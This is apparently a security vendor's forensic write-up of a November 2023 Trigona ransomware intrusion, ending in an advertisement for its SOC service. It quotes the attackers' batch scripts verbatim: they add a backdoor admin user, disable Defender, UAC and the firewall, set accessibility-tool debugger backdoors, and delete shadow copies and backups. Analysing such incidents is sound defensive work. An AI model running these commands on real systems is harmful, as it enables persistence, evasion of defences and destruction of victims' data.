Trigona Ransomware: Forensic Analysis 2023

Real case: Company victim of Trigona Ransomware in November 2023 (client name and sector omitted for confidentiality)

Key points

Gaining persistence after initial access

The attackers started by installing TeamViewer and SplashTop on the compromised machine on November 4, 2023 at 11:41 using the local Administrator user of the exposed system to ensure persistence.

The absence of brute-force attempts and the use of valid credentials suggest that the threat actor may have obtained the local Administrator password of the exposed machine through leaks or purchase from an IAB (Initial Access Broker), especially considering other external access events in the weeks prior to the intrusion.

Lateral movement to the main SQL server

The beginning of the compromise was identified following a lateral movement from the exposed RD machine to the internal SQL server using the same local administrator user that was used for the initial access.

After gaining local administrator access on the SQL server, a file called “newuser.bat” was created that created another Local Administrator user on the SQL machine called “sys”.

newuser.bat - Creation of new user “sys” with password “t1518061-“ (Local Administrator and RDP)

Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "=") Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%
net user sys t1518061- /add
net localgroup %AdmGroup% sys /add

Set RDPGroupSID=S-1-5-32-555
Set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "=") Do Set RDPGroup=%%J
Set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" sys /add
net accounts /maxpwage:unlimited

Defense Evasion Tactics

After creating this user, the “sys” user was used via another batch script to modify the Windows registry and enable WDigest (credential caching), enable RDP via a Windows firewall rule, and disable Windows Defender.

zam.bat (Enables WDigest, Enables RDP, Disables Windows Defender)

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe /f /v Debugger /t REG_SZ /d "%WINDIR%\system32\cmd.exe"
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services /f /v fDenyTSConnections /t REG_DWORD /d 00000000
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services /f /v fAllowUnsolicited /t REG_DWORD /d 00000001
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services /f /v UserAuthentication /t REG_DWORD /d 00000000
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /f /v SecurityLayer /t REG_DWORD /d 00000001
reg add HKLM\SYSTEM\CurrentControlSet\services\WinDefend /v Start /t REG_DWORD /d 4 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v DisableCAD /t REG_DWORD /d 0 /f
netsh advfirewall set allprofiles state off
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters /v AllowEncryptionOracle /t REG_DWORD /d 2

Reconnaissance and lateral movement tasks

Use of NetScan (nmap alternative)

During the intrusion, the “netscan.exe” tool from SoftPerfect Ltd. was copied and executed at C:\Users\Administrador\Pictures\netscan\netscan.exe on several servers as they were being compromised, to discover other machines on the network with RDP and SMB enabled, as well as database services on other network servers.

Data exfiltration

Enabling reading of locked files via IOBit Unlocker

Four days after executing the “zam.bat” script, on November 8, 2023 at 23:09, the cybercriminals installed the software “IOBit Unlocker” to facilitate copying files and reading locked files, such as the SQL database, which cannot be copied if it is in use by another process.

Use of pCloud and exfiltration via rclone

Using this file unlocking method via IOBit Unlocker, they managed to copy and steal database and SQL server information using the private cloud service www.pcloud.com and the remote file copy program rclone.

The rclone configuration file was encrypted. The password used is encrypted with a SHA-256 hash, which produces the key to connect to the server. The hashed password is not stored in the configuration file.

This type of OPSEC demonstrates notable experience on the part of the group that a less experienced threat actor might overlook.

Use of SnipeDrive for file and directory listing

During the exfiltration phase we saw that the threat actor used a program called “sd.exe” (SnipeDrive).

The “sd.exe” program is a self-extracting binary that deploys a tool called “Snap2HTML.exe” along with a batch file designed to run this tool on each disk drive. The functionality of Snap2HTML is interesting for threat actors, as it allows taking a “snapshot” of folder structures on a hard drive and saving them as HTML files.

They used this listing to quickly identify files of interest, plan the data exfiltration, and document the file structure of the victim company.

Escalating from Local Administrator to Domain Admin

Use of mimikatz (packed, in-memory execution)

One day after installing IObit Unlocker and following data exfiltration, on November 9, 2023 at 19:44, the file “423844210.dat” was copied via SplashTop, which contained an encrypted version of the mimikatz tool which was executed in memory to evade the EDR. Following its execution, the ransomware group obtained the credentials of several domain administrators who had logged in to the SQL server with WDigest enabled.

Ransomware Detonation via RDP and SMB

On November 12, 2023 at 1:00, using the SQL server as a pivot, they established multiple RDP connections to critical systems using domain administrator credentials, including several file servers and backup servers on which they also copied and executed the Trigona ransomware.

The ransomware also initiated SMB connections to other remote hosts such as NAS devices and the primary and secondary domain controllers, encrypting them as well.

Deletion of Copies and Databases after Detonation

Deletion of Shadow Copies and Disabling Windows Recovery System

After the ransomware execution, on November 12, 2023 at 3:01, the threat actors massively deployed and executed a file called “coba.bat” to delete Shadow Copies and disable the Windows recovery system.

coba.bat

timeout /t 1 /nobreak
wbadmin delete systemstatebackup -quiet
wbadmin delete backup -quiet
wmic shadowcopy delete
bcdedit /set {default} recoveryenabled no
vssadmin list shadows
timeout /t 1 /nobreak
vssadmin delete shadows /all /quiet
timeout /t 1 /nobreak
net stop "Microsoft Software Shadow Copy Provider"
net stop "Volume Shadow Copy"
net stop "System Restore Service"

Use of Wise Force Deleter to delete SQL databases

After the ransomware detonation, the threat actor also used “WiseDeleter.exe” manually to delete the SQL database, which had not been encrypted by the ransomware since the SQL service was running and prevented the Trigona ransomware from writing to it.

Detection and IOCs (Indicators of Compromise)

IP Addresses

• 77.83.36.6
• 193.106.31.98

Hashes and related files

• SHA256: feb09cc39b1520d228e9e9274500b8c229016d6fc8018a2bf19aa9d3601492c5
  • File: disable-defender.exe
• SHA256: f6440c5cfc1a0bf4fdc63124eef27f40be37af8f46d10aea9a645f5b084004e3
  • File: defoff.bat
• SHA256: da0a235cd729d4aa6b209bfe1edefbeeca8fe2ae92d4e3830db7744c9393eadf
  • File: coba.bat
• SHA256: 69f245dc5e505d2876e2f2eec87fa565c707e7c391845fa8989c14acabc2d3f6
  • File: mim.exe
• SHA256: eeed7ce800a9714b65aaae4f1d61deb83d3f0cbcfd814372807b73c940d4bb8f
  • File: meshagent.exe
• SHA256: 4c181562c9a52be9a629522de7d46f04a490b29d673e8a2376e4cb65158c1be6
  • File: zam.bat
• SHA256: 18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566
  • File: netscan.exe
• SHA256: 1845fe8545b6708e64250b8807f26d095f1875cc1f6159b24c2d0589feb74f0c
  • File: IObitUnlocker.sys

VirusTotal URLs

• disable-defender.exe
• defoff.bat
• coba.bat
• mim.exe
• meshagent.exe
• zam.bat
• netscan.exe
• IObitUnlocker.sys

How our Adversary-Aware SOC would have prevented this attack

Our Adversary-Aware SOC is specifically designed to identify and neutralize ransomware tactics like those used by Trigona:

Thanks to the adversary-focused mindset, our SOC understands the TTPs (Tactics, Techniques, and Procedures) of ransomware groups like Trigona. We actively monitor known IOCs, ransomware behavior patterns, and evasion techniques to stop attacks in their early stages, before they can cause significant damage.

Lessons learned

1. Exposing RDWeb services without 2FA is an open invitation to attackers. Leaked or purchased credentials are available on dark markets.
2. An annual pentest does not detect persistent access. The only way is continuous monitoring of backdoors and remote access tools.
3. Attackers take their time. The attack took 8 days from initial access to ransomware detonation.
4. Exfiltration precedes encryption. Trigona stole data before encrypting to apply double extortion.

Conclusion

The attack was successful because there was no adaptive defense or continuous monitoring. With Merabytes, the story would have ended differently:

• The RDWeb service would have been protected with Cisco Duo 2FA.
• Remote access tools (TeamViewer, SplashTop, MeshAgent) would have been detected and removed.
• The ransomware would not have passed the first host thanks to anti-ransomware rules.
• Creation of privileged users and registry modifications would have generated immediate alerts.

If you are interested in accessing other private reports or specific rules for EDR/XDR, visit merabytes.com and request access to our advanced endpoint protection services + continuous vulnerability analysis.